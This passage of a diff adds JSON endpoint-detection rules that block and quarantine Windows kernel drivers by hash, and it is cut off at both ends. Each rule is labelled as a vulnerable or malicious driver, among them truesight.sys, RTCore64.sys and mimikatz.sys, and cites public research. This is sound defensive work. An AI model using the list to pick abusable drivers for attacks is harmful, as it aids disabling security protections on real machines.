+ "creation_date": "2026-03-23T11:45:30.822584Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822589Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d16e1f28bae42b72cad2b1511ec59968d0659a6913cce8056b4572c20303822",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d894dd5-4a98-5f72-bccb-0d63bd8c07c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159750Z",
+ "creation_date": "2026-03-23T11:45:31.159752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d56f5b795bb2212a7e09393a8cc0bd86f51241e6fa274179949bfb0ccde0f05",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d8c63e2-5b6c-53aa-8ad1-92a37767214f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835842Z",
+ "creation_date": "2026-03-23T11:45:30.835844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12329b9ab6f14b2ad6cb37e76d6f74e14e5790e829035704ea0f5c7a5751e764",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d94af5a-6404-55d4-918f-f5f7f39e8cfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978579Z",
+ "creation_date": "2026-03-23T11:45:29.978581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34b3acdeac5002880071f73b70aa3abd3a6facb9e281b5c93cc82a7a8a6d5cc1",
+ "comment": "Vulnerable Kernel Driver (aka IOMap64.sys) [https://www.loldrivers.io/drivers/f4990bdd-8821-4a3c-a11a-4651e645810c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d9869e2-a925-5ae3-ab47-56662313bb33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483532Z",
+ "creation_date": "2026-03-23T11:45:31.483536Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a6d9f7c20e86d18f329b378991299ff94b7635adf9823bd8ca87eb29010b32c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9da6db87-b3c7-5459-bb02-095f21cb193e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810127Z",
+ "creation_date": "2026-03-23T11:45:31.810131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1480fbab723741589d56bc33add490b8b8753b8bfe54db0c13672d4046e22c1c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9dafdc92-6f3a-5b62-80ec-afae3354709e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462257Z",
+ "creation_date": "2026-03-23T11:45:30.462260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462269Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "184cc3969b79f1856614bed64c1d5562d3363e13a92176f2e9a9235a4aa7d051",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9db59f1b-54e0-586c-a1f2-096d89760999",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145566Z",
+ "creation_date": "2026-03-23T11:45:32.145568Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145574Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3df5f17da8758288b633611afc1c0b6d42c1e56aed5539cfa313986f70ce90e7",
+ "comment": "Vulnerable Kernel Driver (aka ADRMDRVSYS.sys) [https://www.loldrivers.io/drivers/48aeea9b-7812-4b25-9835-baaebe7dc551/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9dbdcbec-ae5b-570f-934a-a202e35a69ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476524Z",
+ "creation_date": "2026-03-23T11:45:30.476527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b756d234559ee0ed93328bb598352ead2efb27eabaf1afac5fb3e2f43b9901f3",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9de54a6d-8837-5d73-9395-dfd72ed199fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154210Z",
+ "creation_date": "2026-03-23T11:45:31.154213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1454ead1d04577ee7332b820fa6d15bb0d3c4f676bc1a15eb9fc823dc7e00e03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9de9d2e6-4a5a-5ad5-bce5-6317d08fe845",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146474Z",
+ "creation_date": "2026-03-23T11:45:32.146477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54942b92790dc0b84c56d4a00f3ac419b0a506344ca7e9f1fb666a86dbc4117f",
+ "comment": "Malicious Kernel Driver (aka f.sys) [https://www.loldrivers.io/drivers/17a1ad58-ecf3-4dea-b1ca-336880d15256/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9df71d7f-9dc2-5088-97a6-20f710b6f54a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142398Z",
+ "creation_date": "2026-03-23T11:45:31.142400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d447654a04902b223620e9a5f1247c1c780c37ab0055ea673973b9c93a1a798d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e01a289-c3db-5125-b41b-3e4677fa8189",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490048Z",
+ "creation_date": "2026-03-23T11:45:31.490051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c09d3f977a422a4da35bc8c0c8843618b36fd24fda467a4c9b818099f6f291fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e041b33-1bab-5873-b467-daf187c764ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142203Z",
+ "creation_date": "2026-03-23T11:45:31.142205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f8da066754639522b60aa827389dfdc363899c56a0260ac2fb61f053db4333f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e0c86be-5196-56b4-866b-5b28cf106569",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149897Z",
+ "creation_date": "2026-03-23T11:45:31.149899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af91b7c87833cf8af531708e945e04061c8eeda1d3115c6458ff82c5cc4d1d09",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e1396ef-4013-5f65-81c0-47e756c048a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610335Z",
+ "creation_date": "2026-03-23T11:45:29.610337Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a6db9facf9e13d35c37dd468be04bae5f70c6127a9aee76daebddbdec95d486",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e18d3f2-a41a-5420-9618-2bc4ebd756c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149915Z",
+ "creation_date": "2026-03-23T11:45:31.149918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "538a437a907b471ae2727e9db9abc01322d18a5b35327fe578710f33b7dfae18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e1a8fb1-32e4-5c07-93dd-6fb2d76300e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485770Z",
+ "creation_date": "2026-03-23T11:45:31.485773Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e42e77ce4e8ccee8f135311ba69d2e3d7cba2212532f074ac4e284904ee298c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e3145dd-1266-5ff1-9e6b-7277f0c8198e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814776Z",
+ "creation_date": "2026-03-23T11:45:31.814779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86f2d62b48fcfe930c39b2831cbb74ae0059b5d80a661a4e0935404830d8b5ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e31a86b-23a5-5fd8-984a-a5e9464fc716",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460180Z",
+ "creation_date": "2026-03-23T11:45:30.460183Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fe5a6f88fbbc85be9efe81204eee11dff1a683b426019d330b1276a3b5424f4",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e3aa0e6-100b-5674-9158-b65d1f8f4ca7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817761Z",
+ "creation_date": "2026-03-23T11:45:31.817764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817773Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1cf9983c2e1b60ff30ed6536e9ad4c63bccddc70c33fc90817b325ac7e4956c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e4545b3-a949-59fa-b167-9b105591ca51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828807Z",
+ "creation_date": "2026-03-23T11:45:30.828809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efc49e1cfae6139fd3b9f17099e560afa0e25c28d3cd44e5873d0feddcde1fe6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e590472-e39c-596b-bb81-510d66022041",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145071Z",
+ "creation_date": "2026-03-23T11:45:31.145073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
